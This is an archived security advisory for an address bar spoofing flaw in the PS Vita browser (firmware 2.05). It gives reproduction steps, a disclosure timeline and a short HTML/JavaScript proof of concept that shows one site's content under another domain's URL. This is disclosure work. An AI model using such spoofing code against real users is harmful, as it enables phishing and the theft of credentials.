what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sony Playstation Vita Addressbar Spoofing

Sony Playstation Vita Addressbar Spoofing
Posted Feb 5, 2013
Authored by David "Aesthetico" Vieira-Kurz | Site majorsecurity.com

The Sony Playstation Vita browser that is in firmware version 2.05 suffers from an addressbar spoofing vulnerability.

tags | exploit, spoof
SHA-256 | 4f94f5e5c19e28c6340f59b12d08adb37173a79130562d0dcdf3c0ae6a51fd9a

Sony Playstation Vita Addressbar Spoofing

Change Mirror Download
[MajorSecurity-SA-2013-014]Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing

Details
=============
Product: Sony Playstation Vita Browser - firmware 2.05
CVE-ID: CVE-2013-XXXX
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://de.playstation.com/psvita/
Advisory-Status: published

Credits
=============
Discovered by: David Vieira-Kurz of MajorSecurity
original advisory: http://majorsecurity.com/psvita/sa-2013-014-en.php

Affected Products
=============
Sony Playstation Vita Browser ( Firmware: 2.05 )
Prior versions may also be affected

Product Description
=============
"Playstation Vita is the new handheld of Sony."

Vulnerability Details
=============
David Vieira-Kurz has discovered some vulnerabilities in Sony PS Vita based on firmware 2.05 .
The weakness is caused due to an error within the handling of URLs when using javascript's window.open() method.
This can be exploited to potentially trick users into supplying sensitive information to a malicious web site,
because information displayed in the address bar can be constructed in a certain way,
which may lead users to believe that they're visiting another web site than the displayed web site.

Steps to reproduce
=============
1) Visit http://majorsecurity.com/psvita/psvita-demo.html with a PS Vita with firmware 2.05 installed
2) click the "demo" button
3) The web browser will open a new window with "http://de.playstation.com/psvita/" in the adress bar,
but in fact "http://de.playstation.com/psvita/" is being displayed inside an iframe within
the host http://www.majorsecurity.com

Proof of Concept
=============
A proof-of-concept code is available here:
http://de.playstation.com/psvita/

Solution
=============
Users should upgrade to a newer version as far as the vendor has supplied a patch.

Timeline
================
2013-01-20, vulnerability identified
2013-01-20, vulnerability reproduced with firmware 2.05
2013-01-20, vendor has been informed
2013-01-27, vendor has been informed once again
2013-01-29, advisory published with partially details
2013-02-05, advisory published with full details and poc

Use of terms
================
Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise,
contact us for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall MajorSecurity be liable for any damages whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages, even if MajorSecurity has been advised of the possibility of such damages.




------------------------- PROOF OF CONCEPT CODE --------------------------

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><title>Sony PS Vita - firmware 2.05 - address bar spoofing</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<!-- Copyright 2013 David Vieira-Kurz and MajorSecurity GmbH -->
</head>
<body><h1>Sony PS Vita - firmware 2.05 - address bar spoofing</h1>
<li>Please click the button to run the proof of concept. <button id="one">Demo</button></li>
<script type="text/javascript">
document.getElementById('one').onclick = function() {
myWindow=window.open('http://de.playstation.com/psvita/','Playstation Vita, PS Vita','width=200,height=100,location=yes');
myWindow.document.write("<html><head></head><body><b>This page is still being hosted on majorsecurity.com, but the address bar is pointing to another domain.</b><br><br><iframe src=\"http://de.playstation.com/psvita/\");></iframe></scri+pt></body></html>");
myWindow.focus();
return false;
}
</script>
</body>
</html>

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close